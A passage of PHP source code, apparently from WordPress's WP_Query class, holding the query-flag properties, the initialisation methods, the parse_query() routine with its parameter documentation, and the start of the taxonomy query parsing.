* @var int
*/
public $max_num_comment_pages = 0;
/**
* Signifies whether the current query is for a single post.
*
* @since 1.5.0
* @var bool
*/
public $is_single = false;
/**
* Signifies whether the current query is for a preview.
*
* @since 2.0.0
* @var bool
*/
public $is_preview = false;
/**
* Signifies whether the current query is for a page.
*
* @since 1.5.0
* @var bool
*/
public $is_page = false;
/**
* Signifies whether the current query is for an archive.
*
* @since 1.5.0
* @var bool
*/
public $is_archive = false;
/**
* Signifies whether the current query is for a date archive.
*
* @since 1.5.0
* @var bool
*/
public $is_date = false;
/**
* Signifies whether the current query is for a year archive.
*
* @since 1.5.0
* @var bool
*/
public $is_year = false;
/**
* Signifies whether the current query is for a month archive.
*
* @since 1.5.0
* @var bool
*/
public $is_month = false;
/**
* Signifies whether the current query is for a day archive.
*
* @since 1.5.0
* @var bool
*/
public $is_day = false;
/**
* Signifies whether the current query is for a specific time.
*
* @since 1.5.0
* @var bool
*/
public $is_time = false;
/**
* Signifies whether the current query is for an author archive.
*
* @since 1.5.0
* @var bool
*/
public $is_author = false;
/**
* Signifies whether the current query is for a category archive.
*
* @since 1.5.0
* @var bool
*/
public $is_category = false;
/**
* Signifies whether the current query is for a tag archive.
*
* @since 2.3.0
* @var bool
*/
public $is_tag = false;
/**
* Signifies whether the current query is for a taxonomy archive.
*
* @since 2.5.0
* @var bool
*/
public $is_tax = false;
/**
* Signifies whether the current query is for a search.
*
* @since 1.5.0
* @var bool
*/
public $is_search = false;
/**
* Signifies whether the current query is for a feed.
*
* @since 1.5.0
* @var bool
*/
public $is_feed = false;
/**
* Signifies whether the current query is for a comment feed.
*
* @since 2.2.0
* @var bool
*/
public $is_comment_feed = false;
/**
* Signifies whether the current query is for trackback endpoint call.
*
* @since 1.5.0
* @var bool
*/
public $is_trackback = false;
/**
* Signifies whether the current query is for the site homepage.
*
* @since 1.5.0
* @var bool
*/
public $is_home = false;
/**
* Signifies whether the current query is for the Privacy Policy page.
*
* @since 5.2.0
* @var bool
*/
public $is_privacy_policy = false;
/**
* Signifies whether the current query couldn't find anything.
*
* @since 1.5.0
* @var bool
*/
public $is_404 = false;
/**
* Signifies whether the current query is for an embed.
*
* @since 4.4.0
* @var bool
*/
public $is_embed = false;
/**
* Signifies whether the current query is for a paged result and not for the first page.
*
* @since 1.5.0
* @var bool
*/
public $is_paged = false;
/**
* Signifies whether the current query is for an administrative interface page.
*
* @since 1.5.0
* @var bool
*/
public $is_admin = false;
/**
* Signifies whether the current query is for an attachment page.
*
* @since 2.0.0
* @var bool
*/
public $is_attachment = false;
/**
* Signifies whether the current query is for an existing single post of any post type
* (post, attachment, page, custom post types).
*
* @since 2.1.0
* @var bool
*/
public $is_singular = false;
/**
* Signifies whether the current query is for the robots.txt file.
*
* @since 2.1.0
* @var bool
*/
public $is_robots = false;
/**
* Signifies whether the current query is for the favicon.ico file.
*
* @since 5.4.0
* @var bool
*/
public $is_favicon = false;
/**
* Signifies whether the current query is for the page_for_posts page.
*
* Basically, the homepage if the option isn't set for the static homepage.
*
* @since 2.1.0
* @var bool
*/
public $is_posts_page = false;
/**
* Signifies whether the current query is for a post type archive.
*
* @since 3.1.0
* @var bool
*/
public $is_post_type_archive = false;
/**
* Stores the ->query_vars state like md5(serialize( $this->query_vars ) ) so we know
* whether we have to re-parse because something has changed
*
* @since 3.1.0
* @var bool|string
*/
private $query_vars_hash = false;
/**
* Whether query vars have changed since the initial parse_query() call. Used to catch modifications to query vars made
* via pre_get_posts hooks.
*
* @since 3.1.1
* @var bool
*/
private $query_vars_changed = true;
/**
* Set if post thumbnails are cached
*
* @since 3.2.0
* @var bool
*/
public $thumbnails_cached = false;
/**
* Controls whether an attachment query should include filenames or not.
*
* @since 6.0.3
* @var bool
*/
protected $allow_query_attachment_by_filename = false;
/**
* Cached list of search stopwords.
*
* @since 3.7.0
* @var array
*/
private $stopwords;
private $compat_fields = array( 'query_vars_hash', 'query_vars_changed' );
private $compat_methods = array( 'init_query_flags', 'parse_tax_query' );
/**
* The cache key generated by the query.
*
* The cache key is generated by the method ::generate_cache_key() after the
* query has been normalized.
*
* @since 6.8.0
* @var string
*/
private $query_cache_key = '';
/**
* Resets query flags to false.
*
* The query flags are what page info WordPress was able to figure out.
*
* @since 2.0.0
*/
private function init_query_flags() {
$this->is_single = false;
$this->is_preview = false;
$this->is_page = false;
$this->is_archive = false;
$this->is_date = false;
$this->is_year = false;
$this->is_month = false;
$this->is_day = false;
$this->is_time = false;
$this->is_author = false;
$this->is_category = false;
$this->is_tag = false;
$this->is_tax = false;
$this->is_search = false;
$this->is_feed = false;
$this->is_comment_feed = false;
$this->is_trackback = false;
$this->is_home = false;
$this->is_privacy_policy = false;
$this->is_404 = false;
$this->is_paged = false;
$this->is_admin = false;
$this->is_attachment = false;
$this->is_singular = false;
$this->is_robots = false;
$this->is_favicon = false;
$this->is_posts_page = false;
$this->is_post_type_archive = false;
}
/**
* Initiates object properties and sets default values.
*
* @since 1.5.0
*/
public function init() {
unset( $this->posts );
unset( $this->query );
$this->query_vars = array();
unset( $this->queried_object );
unset( $this->queried_object_id );
$this->post_count = 0;
$this->current_post = -1;
$this->in_the_loop = false;
$this->before_loop = true;
unset( $this->request );
unset( $this->post );
unset( $this->comments );
unset( $this->comment );
$this->comment_count = 0;
$this->current_comment = -1;
$this->found_posts = 0;
$this->max_num_pages = 0;
$this->max_num_comment_pages = 0;
$this->init_query_flags();
}
/**
* Reparses the query vars.
*
* @since 1.5.0
*/
public function parse_query_vars() {
$this->parse_query();
}
/**
* Fills in the query variables, which do not exist within the parameter.
*
* @since 2.1.0
* @since 4.5.0 Removed the `comments_popup` public query variable.
*
* @param array $query_vars Defined query variables.
* @return array Complete query variables with undefined ones filled in empty.
*/
public function fill_query_vars( $query_vars ) {
$keys = array(
'error',
'm',
'p',
'post_parent',
'subpost',
'subpost_id',
'attachment',
'attachment_id',
'name',
'pagename',
'page_id',
'second',
'minute',
'hour',
'day',
'monthnum',
'year',
'w',
'category_name',
'tag',
'cat',
'tag_id',
'author',
'author_name',
'feed',
'tb',
'paged',
'meta_key',
'meta_value',
'preview',
's',
'sentence',
'title',
'fields',
'menu_order',
'embed',
);
foreach ( $keys as $key ) {
if ( ! isset( $query_vars[ $key ] ) ) {
$query_vars[ $key ] = '';
}
}
$array_keys = array(
'category__in',
'category__not_in',
'category__and',
'post__in',
'post__not_in',
'post_name__in',
'tag__in',
'tag__not_in',
'tag__and',
'tag_slug__in',
'tag_slug__and',
'post_parent__in',
'post_parent__not_in',
'author__in',
'author__not_in',
'search_columns',
);
foreach ( $array_keys as $key ) {
if ( ! isset( $query_vars[ $key ] ) ) {
$query_vars[ $key ] = array();
}
}
return $query_vars;
}
/**
* Parses a query string and sets query type booleans.
*
* @since 1.5.0
* @since 4.2.0 Introduced the ability to order by specific clauses of a `$meta_query`, by passing the clause's
* array key to `$orderby`.
* @since 4.4.0 Introduced `$post_name__in` and `$title` parameters. `$s` was updated to support excluded
* search terms, by prepending a hyphen.
* @since 4.5.0 Removed the `$comments_popup` parameter.
* Introduced the `$comment_status` and `$ping_status` parameters.
* Introduced `RAND(x)` syntax for `$orderby`, which allows an integer seed value to random sorts.
* @since 4.6.0 Added 'post_name__in' support for `$orderby`. Introduced the `$lazy_load_term_meta` argument.
* @since 4.9.0 Introduced the `$comment_count` parameter.
* @since 5.1.0 Introduced the `$meta_compare_key` parameter.
* @since 5.3.0 Introduced the `$meta_type_key` parameter.
* @since 6.1.0 Introduced the `$update_menu_item_cache` parameter.
* @since 6.2.0 Introduced the `$search_columns` parameter.
*
* @param string|array $query {
* Optional. Array or string of Query parameters.
*
* @type int $attachment_id Attachment post ID. Used for 'attachment' post_type.
* @type int|string $author Author ID, or comma-separated list of IDs.
* @type string $author_name User 'user_nicename'.
* @type int[] $author__in An array of author IDs to query from.
* @type int[] $author__not_in An array of author IDs not to query from.
* @type bool $cache_results Whether to cache post information. Default true.
* @type int|string $cat Category ID or comma-separated list of IDs (this or any children).
* @type int[] $category__and An array of category IDs (AND in).
* @type int[] $category__in An array of category IDs (OR in, no children).
* @type int[] $category__not_in An array of category IDs (NOT in).
* @type string $category_name Use category slug (not name, this or any children).
* @type array|int $comment_count Filter results by comment count. Provide an integer to match
* comment count exactly. Provide an array with integer 'value'
* and 'compare' operator ('=', '!=', '>', '>=', '<', '<=' ) to
* compare against comment_count in a specific way.
* @type string $comment_status Comment status.
* @type int $comments_per_page The number of comments to return per page.
* Default 'comments_per_page' option.
* @type array $date_query An associative array of WP_Date_Query arguments.
* See WP_Date_Query::__construct().
* @type int $day Day of the month. Default empty. Accepts numbers 1-31.
* @type bool $exact Whether to search by exact keyword. Default false.
* @type string $fields Post fields to query for. Accepts:
* - '' Returns an array of complete post objects (`WP_Post[]`).
* - 'ids' Returns an array of post IDs (`int[]`).
* - 'id=>parent' Returns an associative array of parent post IDs,
* keyed by post ID (`int[]`).
* Default ''.
* @type int $hour Hour of the day. Default empty. Accepts numbers 0-23.
* @type int|bool $ignore_sticky_posts Whether to ignore sticky posts or not. Setting this to false
* excludes stickies from 'post__in'. Accepts 1|true, 0|false.
* Default false.
* @type int $m Combination YearMonth. Accepts any four-digit year and month
* numbers 01-12. Default empty.
* @type string|string[] $meta_key Meta key or keys to filter by.
* @type string|string[] $meta_value Meta value or values to filter by.
* @type string $meta_compare MySQL operator used for comparing the meta value.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_compare_key MySQL operator used for comparing the meta key.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type MySQL data type that the meta_value column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type_key MySQL data type that the meta_key column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type array $meta_query An associative array of WP_Meta_Query arguments.
* See WP_Meta_Query::__construct() for accepted values.
* @type int $menu_order The menu order of the posts.
* @type int $minute Minute of the hour. Default empty. Accepts numbers 0-59.
* @type int $monthnum The two-digit month. Default empty. Accepts numbers 1-12.
* @type string $name Post slug.
* @type bool $nopaging Show all posts (true) or paginate (false). Default false.
* @type bool $no_found_rows Whether to skip counting the total rows found. Enabling can improve
* performance. Default false.
* @type int $offset The number of posts to offset before retrieval.
* @type string $order Designates ascending or descending order of posts. Default 'DESC'.
* Accepts 'ASC', 'DESC'.
* @type string|array $orderby Sort retrieved posts by parameter. One or more options may be passed.
* To use 'meta_value', or 'meta_value_num', 'meta_key=keyname' must be
* also be defined. To sort by a specific `$meta_query` clause, use that
* clause's array key. Accepts:
* - 'none'
* - 'name'
* - 'author'
* - 'date'
* - 'title'
* - 'modified'
* - 'menu_order'
* - 'parent'
* - 'ID'
* - 'rand'
* - 'relevance'
* - 'RAND(x)' (where 'x' is an integer seed value)
* - 'comment_count'
* - 'meta_value'
* - 'meta_value_num'
* - 'post__in'
* - 'post_name__in'
* - 'post_parent__in'
* - The array keys of `$meta_query`.
* Default is 'date', except when a search is being performed, when
* the default is 'relevance'.
* @type int $p Post ID.
* @type int $page Show the number of posts that would show up on page X of a
* static front page.
* @type int $paged The number of the current page.
* @type int $page_id Page ID.
* @type string $pagename Page slug.
* @type string $perm Show posts if user has the appropriate capability.
* @type string $ping_status Ping status.
* @type int[] $post__in An array of post IDs to retrieve, sticky posts will be included.
* @type int[] $post__not_in An array of post IDs not to retrieve. Note: a string of comma-
* separated IDs will NOT work.
* @type string $post_mime_type The mime type of the post. Used for 'attachment' post_type.
* @type string[] $post_name__in An array of post slugs that results must match.
* @type int $post_parent Page ID to retrieve child pages for. Use 0 to only retrieve
* top-level pages.
* @type int[] $post_parent__in An array containing parent page IDs to query child pages from.
* @type int[] $post_parent__not_in An array containing parent page IDs not to query child pages from.
* @type string|string[] $post_type A post type slug (string) or array of post type slugs.
* Default 'any' if using 'tax_query'.
* @type string|string[] $post_status A post status (string) or array of post statuses.
* @type int $posts_per_page The number of posts to query for. Use -1 to request all posts.
* @type int $posts_per_archive_page The number of posts to query for by archive page. Overrides
* 'posts_per_page' when is_archive(), or is_search() are true.
* @type string $s Search keyword(s). Prepending a term with a hyphen will
* exclude posts matching that term. Eg, 'pillow -sofa' will
* return posts containing 'pillow' but not 'sofa'. The
* character used for exclusion can be modified using the
* the 'wp_query_search_exclusion_prefix' filter.
* @type string[] $search_columns Array of column names to be searched. Accepts 'post_title',
* 'post_excerpt' and 'post_content'. Default empty array.
* @type int $second Second of the minute. Default empty. Accepts numbers 0-59.
* @type bool $sentence Whether to search by phrase. Default false.
* @type bool $suppress_filters Whether to suppress filters. Default false.
* @type string $tag Tag slug. Comma-separated (either), Plus-separated (all).
* @type int[] $tag__and An array of tag IDs (AND in).
* @type int[] $tag__in An array of tag IDs (OR in).
* @type int[] $tag__not_in An array of tag IDs (NOT in).
* @type int $tag_id Tag id or comma-separated list of IDs.
* @type string[] $tag_slug__and An array of tag slugs (AND in).
* @type string[] $tag_slug__in An array of tag slugs (OR in). unless 'ignore_sticky_posts' is
* true. Note: a string of comma-separated IDs will NOT work.
* @type array $tax_query An associative array of WP_Tax_Query arguments.
* See WP_Tax_Query::__construct().
* @type string $title Post title.
* @type bool $update_post_meta_cache Whether to update the post meta cache. Default true.
* @type bool $update_post_term_cache Whether to update the post term cache. Default true.
* @type bool $update_menu_item_cache Whether to update the menu item cache. Default false.
* @type bool $lazy_load_term_meta Whether to lazy-load term meta. Setting to false will
* disable cache priming for term meta, so that each
* get_term_meta() call will hit the database.
* Defaults to the value of `$update_post_term_cache`.
* @type int $w The week number of the year. Default empty. Accepts numbers 0-53.
* @type int $year The four-digit year. Default empty. Accepts any four-digit year.
* }
*/
public function parse_query( $query = '' ) {
if ( ! empty( $query ) ) {
$this->init();
$this->query = wp_parse_args( $query );
$this->query_vars = $this->query;
} elseif ( ! isset( $this->query ) ) {
$this->query = $this->query_vars;
}
$this->query_vars = $this->fill_query_vars( $this->query_vars );
$query_vars = &$this->query_vars;
$this->query_vars_changed = true;
if ( ! empty( $query_vars['robots'] ) ) {
$this->is_robots = true;
} elseif ( ! empty( $query_vars['favicon'] ) ) {
$this->is_favicon = true;
}
if ( ! is_scalar( $query_vars['p'] ) || (int) $query_vars['p'] < 0 ) {
$query_vars['p'] = 0;
$query_vars['error'] = '404';
} else {
$query_vars['p'] = (int) $query_vars['p'];
}
$query_vars['page_id'] = is_scalar( $query_vars['page_id'] ) ? absint( $query_vars['page_id'] ) : 0;
$query_vars['year'] = is_scalar( $query_vars['year'] ) ? absint( $query_vars['year'] ) : 0;
$query_vars['monthnum'] = is_scalar( $query_vars['monthnum'] ) ? absint( $query_vars['monthnum'] ) : 0;
$query_vars['day'] = is_scalar( $query_vars['day'] ) ? absint( $query_vars['day'] ) : 0;
$query_vars['w'] = is_scalar( $query_vars['w'] ) ? absint( $query_vars['w'] ) : 0;
$query_vars['m'] = is_scalar( $query_vars['m'] ) ? preg_replace( '|[^0-9]|', '', $query_vars['m'] ) : '';
$query_vars['paged'] = is_scalar( $query_vars['paged'] ) ? absint( $query_vars['paged'] ) : 0;
$query_vars['cat'] = preg_replace( '|[^0-9,-]|', '', $query_vars['cat'] ); // Array or comma-separated list of positive or negative integers.
$query_vars['author'] = is_scalar( $query_vars['author'] ) ? preg_replace( '|[^0-9,-]|', '', $query_vars['author'] ) : ''; // Comma-separated list of positive or negative integers.
$query_vars['pagename'] = is_scalar( $query_vars['pagename'] ) ? trim( $query_vars['pagename'] ) : '';
$query_vars['name'] = is_scalar( $query_vars['name'] ) ? trim( $query_vars['name'] ) : '';
$query_vars['title'] = is_scalar( $query_vars['title'] ) ? trim( $query_vars['title'] ) : '';
if ( is_scalar( $query_vars['hour'] ) && '' !== $query_vars['hour'] ) {
$query_vars['hour'] = absint( $query_vars['hour'] );
} else {
$query_vars['hour'] = '';
}
if ( is_scalar( $query_vars['minute'] ) && '' !== $query_vars['minute'] ) {
$query_vars['minute'] = absint( $query_vars['minute'] );
} else {
$query_vars['minute'] = '';
}
if ( is_scalar( $query_vars['second'] ) && '' !== $query_vars['second'] ) {
$query_vars['second'] = absint( $query_vars['second'] );
} else {
$query_vars['second'] = '';
}
if ( is_scalar( $query_vars['menu_order'] ) && '' !== $query_vars['menu_order'] ) {
$query_vars['menu_order'] = absint( $query_vars['menu_order'] );
} else {
$query_vars['menu_order'] = '';
}
// Fairly large, potentially too large, upper bound for search string lengths.
if ( ! is_scalar( $query_vars['s'] ) || ( ! empty( $query_vars['s'] ) && strlen( $query_vars['s'] ) > 1600 ) ) {
$query_vars['s'] = '';
}
// Compat. Map subpost to attachment.
if ( is_scalar( $query_vars['subpost'] ) && '' != $query_vars['subpost'] ) {
$query_vars['attachment'] = $query_vars['subpost'];
}
if ( is_scalar( $query_vars['subpost_id'] ) && '' != $query_vars['subpost_id'] ) {
$query_vars['attachment_id'] = $query_vars['subpost_id'];
}
$query_vars['attachment_id'] = is_scalar( $query_vars['attachment_id'] ) ? absint( $query_vars['attachment_id'] ) : 0;
if ( ( '' !== $query_vars['attachment'] ) || ! empty( $query_vars['attachment_id'] ) ) {
$this->is_single = true;
$this->is_attachment = true;
} elseif ( '' !== $query_vars['name'] ) {
$this->is_single = true;
} elseif ( $query_vars['p'] ) {
$this->is_single = true;
} elseif ( '' !== $query_vars['pagename'] || ! empty( $query_vars['page_id'] ) ) {
$this->is_page = true;
$this->is_single = false;
} else {
// Look for archive queries. Dates, categories, authors, search, post type archives.
if ( isset( $this->query['s'] ) ) {
$this->is_search = true;
}
if ( '' !== $query_vars['second'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( '' !== $query_vars['minute'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( '' !== $query_vars['hour'] ) {
$this->is_time = true;
$this->is_date = true;
}
if ( $query_vars['day'] ) {
if ( ! $this->is_date ) {
$date = sprintf( '%04d-%02d-%02d', $query_vars['year'], $query_vars['monthnum'], $query_vars['day'] );
if ( $query_vars['monthnum'] && $query_vars['year'] && ! wp_checkdate( $query_vars['monthnum'], $query_vars['day'], $query_vars['year'], $date ) ) {
$query_vars['error'] = '404';
} else {
$this->is_day = true;
$this->is_date = true;
}
}
}
if ( $query_vars['monthnum'] ) {
if ( ! $this->is_date ) {
if ( 12 < $query_vars['monthnum'] ) {
$query_vars['error'] = '404';
} else {
$this->is_month = true;
$this->is_date = true;
}
}
}
if ( $query_vars['year'] ) {
if ( ! $this->is_date ) {
$this->is_year = true;
$this->is_date = true;
}
}
if ( $query_vars['m'] ) {
$this->is_date = true;
if ( strlen( $query_vars['m'] ) > 9 ) {
$this->is_time = true;
} elseif ( strlen( $query_vars['m'] ) > 7 ) {
$this->is_day = true;
} elseif ( strlen( $query_vars['m'] ) > 5 ) {
$this->is_month = true;
} else {
$this->is_year = true;
}
}
if ( $query_vars['w'] ) {
$this->is_date = true;
}
$this->query_vars_hash = false;
$this->parse_tax_query( $query_vars );
foreach ( $this->tax_query->queries as $tax_query ) {
if ( ! is_array( $tax_query ) ) {
continue;
}
if ( isset( $tax_query['operator'] ) && 'NOT IN' !== $tax_query['operator'] ) {
switch ( $tax_query['taxonomy'] ) {
case 'category':
$this->is_category = true;
break;
case 'post_tag':
$this->is_tag = true;
break;
default:
$this->is_tax = true;
}
}
}
unset( $tax_query );
if ( empty( $query_vars['author'] ) || ( '0' == $query_vars['author'] ) ) {
$this->is_author = false;
} else {
$this->is_author = true;
}
if ( '' !== $query_vars['author_name'] ) {
$this->is_author = true;
}
if ( ! empty( $query_vars['post_type'] ) && ! is_array( $query_vars['post_type'] ) ) {
$post_type_obj = get_post_type_object( $query_vars['post_type'] );
if ( ! empty( $post_type_obj->has_archive ) ) {
$this->is_post_type_archive = true;
}
}
if ( $this->is_post_type_archive || $this->is_date || $this->is_author || $this->is_category || $this->is_tag || $this->is_tax ) {
$this->is_archive = true;
}
}
if ( '' != $query_vars['feed'] ) {
$this->is_feed = true;
}
if ( '' != $query_vars['embed'] ) {
$this->is_embed = true;
}
if ( '' != $query_vars['tb'] ) {
$this->is_trackback = true;
}
if ( '' != $query_vars['paged'] && ( (int) $query_vars['paged'] > 1 ) ) {
$this->is_paged = true;
}
// If we're previewing inside the write screen.
if ( '' != $query_vars['preview'] ) {
$this->is_preview = true;
}
if ( is_admin() ) {
$this->is_admin = true;
}
if ( str_contains( $query_vars['feed'], 'comments-' ) ) {
$query_vars['feed'] = str_replace( 'comments-', '', $query_vars['feed'] );
$query_vars['withcomments'] = 1;
}
$this->is_singular = $this->is_single || $this->is_page || $this->is_attachment;
if ( $this->is_feed && ( ! empty( $query_vars['withcomments'] ) || ( empty( $query_vars['withoutcomments'] ) && $this->is_singular ) ) ) {
$this->is_comment_feed = true;
}
if ( ! ( $this->is_singular || $this->is_archive || $this->is_search || $this->is_feed
|| ( wp_is_serving_rest_request() && $this->is_main_query() )
|| $this->is_trackback || $this->is_404 || $this->is_admin || $this->is_robots || $this->is_favicon ) ) {
$this->is_home = true;
}
// Correct `is_*` for 'page_on_front' and 'page_for_posts'.
if ( $this->is_home && 'page' === get_option( 'show_on_front' ) && get_option( 'page_on_front' ) ) {
$_query = wp_parse_args( $this->query );
// 'pagename' can be set and empty depending on matched rewrite rules. Ignore an empty 'pagename'.
if ( isset( $_query['pagename'] ) && '' === $_query['pagename'] ) {
unset( $_query['pagename'] );
}
unset( $_query['embed'] );
if ( empty( $_query ) || ! array_diff( array_keys( $_query ), array( 'preview', 'page', 'paged', 'cpage' ) ) ) {
$this->is_page = true;
$this->is_home = false;
$query_vars['page_id'] = get_option( 'page_on_front' );
// Correct <!--nextpage--> for 'page_on_front'.
if ( ! empty( $query_vars['paged'] ) ) {
$query_vars['page'] = $query_vars['paged'];
unset( $query_vars['paged'] );
}
}
}
if ( '' !== $query_vars['pagename'] ) {
$this->queried_object = get_page_by_path( $query_vars['pagename'] );
if ( $this->queried_object && 'attachment' === $this->queried_object->post_type ) {
if ( preg_match( '/^[^%]*%(?:postname)%/', get_option( 'permalink_structure' ) ) ) {
// See if we also have a post with the same slug.
$post = get_page_by_path( $query_vars['pagename'], OBJECT, 'post' );
if ( $post ) {
$this->queried_object = $post;
$this->is_page = false;
$this->is_single = true;
}
}
}
if ( ! empty( $this->queried_object ) ) {
$this->queried_object_id = (int) $this->queried_object->ID;
} else {
unset( $this->queried_object );
}
if ( 'page' === get_option( 'show_on_front' ) && isset( $this->queried_object_id ) && get_option( 'page_for_posts' ) == $this->queried_object_id ) {
$this->is_page = false;
$this->is_home = true;
$this->is_posts_page = true;
}
if ( isset( $this->queried_object_id ) && get_option( 'wp_page_for_privacy_policy' ) == $this->queried_object_id ) {
$this->is_privacy_policy = true;
}
}
if ( $query_vars['page_id'] ) {
if ( 'page' === get_option( 'show_on_front' ) && get_option( 'page_for_posts' ) == $query_vars['page_id'] ) {
$this->is_page = false;
$this->is_home = true;
$this->is_posts_page = true;
}
if ( get_option( 'wp_page_for_privacy_policy' ) == $query_vars['page_id'] ) {
$this->is_privacy_policy = true;
}
}
if ( ! empty( $query_vars['post_type'] ) ) {
if ( is_array( $query_vars['post_type'] ) ) {
$query_vars['post_type'] = array_map( 'sanitize_key', array_unique( $query_vars['post_type'] ) );
sort( $query_vars['post_type'] );
} else {
$query_vars['post_type'] = sanitize_key( $query_vars['post_type'] );
}
}
if ( ! empty( $query_vars['post_status'] ) ) {
if ( is_array( $query_vars['post_status'] ) ) {
$query_vars['post_status'] = array_map( 'sanitize_key', array_unique( $query_vars['post_status'] ) );
sort( $query_vars['post_status'] );
} else {
$query_vars['post_status'] = preg_replace( '|[^a-z0-9_,-]|', '', $query_vars['post_status'] );
}
}
if ( $this->is_posts_page && ( ! isset( $query_vars['withcomments'] ) || ! $query_vars['withcomments'] ) ) {
$this->is_comment_feed = false;
}
$this->is_singular = $this->is_single || $this->is_page || $this->is_attachment;
// Done correcting `is_*` for 'page_on_front' and 'page_for_posts'.
if ( '404' == $query_vars['error'] ) {
$this->set_404();
}
$this->is_embed = $this->is_embed && ( $this->is_singular || $this->is_404 );
$this->query_vars_hash = md5( serialize( $this->query_vars ) );
$this->query_vars_changed = false;
/**
* Fires after the main query vars have been parsed.
*
* @since 1.5.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'parse_query', array( &$this ) );
}
/**
* Parses various taxonomy related query vars.
*
* For BC, this method is not marked as protected. See [28987].
*
* @since 3.1.0
*
* @param array $query_vars The query variables. Passed by reference.
*/
public function parse_tax_query( &$query_vars ) {
if ( ! empty( $query_vars['tax_query'] ) && is_array( $query_vars['tax_query'] ) ) {
$tax_query = $query_vars['tax_query'];
} else {
$tax_query = array();
}
if ( ! empty( $query_vars['taxonomy'] ) && ! empty( $query_vars['term'] ) ) {
$tax_query[] = array(
'taxonomy' => $query_vars['taxonomy'],
'terms' => array( $query_vars['term'] ),
'field' => 'slug',
);
}
foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $t ) {
if ( 'post_tag' === $taxonomy ) {
continue; // Handled further down in the $query_vars['tag'] block.
}
if ( $t->query_var && ! empty( $query_vars[ $t->query_var ] ) ) {
$tax_query_defaults = array(
'taxonomy' => $taxonomy,
'field' => 'slug',
);
if ( ! empty( $t->rewrite['hierarchical'] ) ) {
$query_vars[ $t->query_var ] = wp_basename( $query_vars[ $t->query_var ] );
}
$term = $query_vars[ $t->query_var ];
if ( ! is_array( $term ) ) {
$term = explode( ',', $term );
$term = array_map( 'trim', $term );
}
sort( $term );
$term = implode( ',', $term );
if ( str_contains( $term, '+' ) ) {
$terms = preg_split( '/[+]+/', $term );
foreach ( $terms as $term ) {
$tax_query[] = array_merge(
$tax_query_defaults,
array(
'terms' => array( $term ),
)
);
}
} else {
$tax_query[] = array_merge(
$tax_query_defaults,
array(
'terms' => preg_split( '/[,]+/', $term ),
)
);
}
}
}
// If query string 'cat' is an array, implode it.
if ( is_array( $query_vars['cat'] ) ) {
$query_vars['cat'] = implode( ',', $query_vars['cat'] );
}
// Category stuff.
if ( ! empty( $query_vars['cat'] ) && ! $this->is_singular ) {
$cat_in = array();
$cat_not_in = array();
$cat_array = preg_split( '/[,\s]+/', urldecode( $query_vars['cat'] ) );
$cat_array = array_map( 'intval', $cat_array );
sort( $cat_array );
$query_vars['cat'] = implode( ',', $cat_array );
foreach ( $cat_array as $cat ) {
if ( $cat > 0 ) {
$cat_in[] = $cat;
} elseif ( $cat < 0 ) {
$cat_not_in[] = abs( $cat );
}
}
if ( ! empty( $cat_in ) ) {
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $cat_in,
'field' => 'term_id',
'include_children' => true,
);
}
if ( ! empty( $cat_not_in ) ) {
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $cat_not_in,
'field' => 'term_id',
'operator' => 'NOT IN',
'include_children' => true,
);
}
unset( $cat_array, $cat_in, $cat_not_in );
}
if ( ! empty( $query_vars['category__and'] ) && 1 === count( (array) $query_vars['category__and'] ) ) {
$query_vars['category__and'] = (array) $query_vars['category__and'];
if ( ! isset( $query_vars['category__in'] ) ) {
$query_vars['category__in'] = array();
}
$query_vars['category__in'][] = absint( reset( $query_vars['category__and'] ) );
unset( $query_vars['category__and'] );
}
if ( ! empty( $query_vars['category__in'] ) ) {
$query_vars['category__in'] = array_map( 'absint', array_unique( (array) $query_vars['category__in'] ) );
sort( $query_vars['category__in'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__in'],
'field' => 'term_id',
'include_children' => false,
);
}
if ( ! empty( $query_vars['category__not_in'] ) ) {
$query_vars['category__not_in'] = array_map( 'absint', array_unique( (array) $query_vars['category__not_in'] ) );
sort( $query_vars['category__not_in'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__not_in'],
'operator' => 'NOT IN',
'include_children' => false,
);
}
if ( ! empty( $query_vars['category__and'] ) ) {
$query_vars['category__and'] = array_map( 'absint', array_unique( (array) $query_vars['category__and'] ) );
sort( $query_vars['category__and'] );
$tax_query[] = array(
'taxonomy' => 'category',
'terms' => $query_vars['category__and'],
'field' => 'term_id',
'operator' => 'AND',
'include_children' => false,
);
}
// If query string 'tag' is array, implode it.
if ( is_array( $query_vars['tag'] ) ) {
$query_vars['tag'] = implode( ',', $query_vars['tag'] );
}
// Tag stuff.
if ( '' !== $query_vars['tag'] && ! $this->is_singular && $this->query_vars_changed ) {
if ( str_contains( $query_vars['tag'], ',' ) ) {
// @todo Handle normalizing `tag` query string.
$tags = preg_split( '/[,\r\n\t ]+/', $query_vars['tag'] );
foreach ( (array) $tags as $tag ) {
$tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' );
$query_vars['tag_slug__in'][] = $tag;
sort( $query_vars['tag_slug__in'] );
}
} elseif ( preg_match( '/[+\r\n\t ]+/', $query_vars['tag'] ) || ! empty( $query_vars['cat'] ) ) {
$tags = preg_split( '/[+\r\n\t ]+/', $query_vars['tag'] );
foreach ( (array) $tags as $tag ) {
$tag = sanitize_term_field( 'slug', $tag, 0, 'post_tag', 'db' );
$query_vars['tag_slug__and'][] = $tag;
}
} else {
$query_vars['tag'] = sanitize_term_field( 'slug', $query_vars['tag'], 0, 'post_tag', 'db' );
$query_vars['tag_slug__in'][] = $query_vars['tag'];
sort( $query_vars['tag_slug__in'] );
}
}
if ( ! empty( $query_vars['tag_id'] ) ) {
$query_vars['tag_id'] = absint( $query_vars['tag_id'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_id'],
);
}
if ( ! empty( $query_vars['tag__in'] ) ) {
$query_vars['tag__in'] = array_map( 'absint', array_unique( (array) $query_vars['tag__in'] ) );
sort( $query_vars['tag__in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__in'],
);
}
